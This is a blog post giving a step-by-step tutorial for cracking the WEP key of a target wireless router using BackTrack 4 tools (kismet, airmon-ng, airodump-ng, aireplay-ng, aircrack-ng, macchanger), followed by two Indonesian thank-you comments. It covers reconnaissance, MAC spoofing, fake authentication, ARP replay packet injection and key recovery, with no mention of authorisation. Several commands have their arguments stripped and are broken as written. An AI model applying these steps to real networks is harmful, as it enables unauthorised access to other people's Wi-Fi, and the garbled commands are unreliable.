Cracking WEP with BACKTRACK4 on Acer Aspire one

Cracking WEP with BACKTRACK4 on Acer Aspire one.
Backtrack tools used:
1. Kismet – used to gather info on wireless networks (encryption algorithm, MAC address, SSID).
2. airmon – Set wireless device into monitor mode
3. airodump – captures packets from a wireless router
4. aireplay – forges ARP requests
5. aircrack – decrypts WEP keys
6. iwconfig – configures wireless adapters. We use to check that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
7. macchanger – a tool that allows you to view and/or spoof (fake) your MAC address.

Step 1: (Get your wireless interface running in monitor mode)
1. Open terminal and run iwconfig.
2. You should have lo, eth0, wifi0 each listed with no wireless extensions.
3. We’ll be using the ath0 VAP (Virtual Access Point) associated to wifi0. So, if you hav a ath0 in your iwconfig results…stop it with airmon-ng stop ath0.
4. Once you’ve verified ath0 is not running with iwconfig…enter airmon-ng start wifi0 to start ath0 in monitor mode…NOTE: you can set the channel number by adding it to the end of the airmon-ng command if you know what channel number your target is using (gathered from kismet)…e.g. airmon-ng start wifi0 6 for channel 6.
5. Rerun iwconfig and verify ath0 is running in monitoring mode.

Step 2: (Gather information about your target and your wireless adapter)
1. Modify /etc/kismet/kismet.conf so that the source uses the madwifi_g driver:
2. run kismet from a console window.
3. select a router that is using WEP (type ‘s’ then ‘Q’ to get it out of autofit so you can highlight a router and hit Enter or ‘i’ for more information.
4. write down the bssid tag (MAC address) for the router and it’s essid tag (broadcast name).
5. Find your MAC address in another console window by running macchanger -s ath0

Step 3: (Start data collection)
1. airodump-ng -w –channel –ivs –bssid ath0
2. you should start seeing packets incrementing…verify you’re using the correct bssid and your MAC is listed under the STATION column.

Step 4: (Associate your wireless card with your target)
1. run aireplay-ng –fakeauth 0 -e -a -h ath0
2. Wait until you see “Asociation successful 🙂 (AID: 1)” before continuing.

Step 5: (Start packet injection)
1. aireplay-ng -3 -b -h ath0
2. you should start seeing ARP request number start scrolling fast after a few seconds…if you don’t, you need to redo step 3.

Step 6: (Decrypt the WEP key)
1. aircrack-ng -s
2. You should have a decrytped key in less than 5 minutes.


2 Responses

  1. makasih mas tips2nya. lengkap banget deh.
    bkn cm ttg komputer, tp jg ttg kehidupan. syukron

  2. iya sama sama semoga kita masih tetap mengingat Allah SWT dan bersyukur apa yang telah kita dapatkan selama ini.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: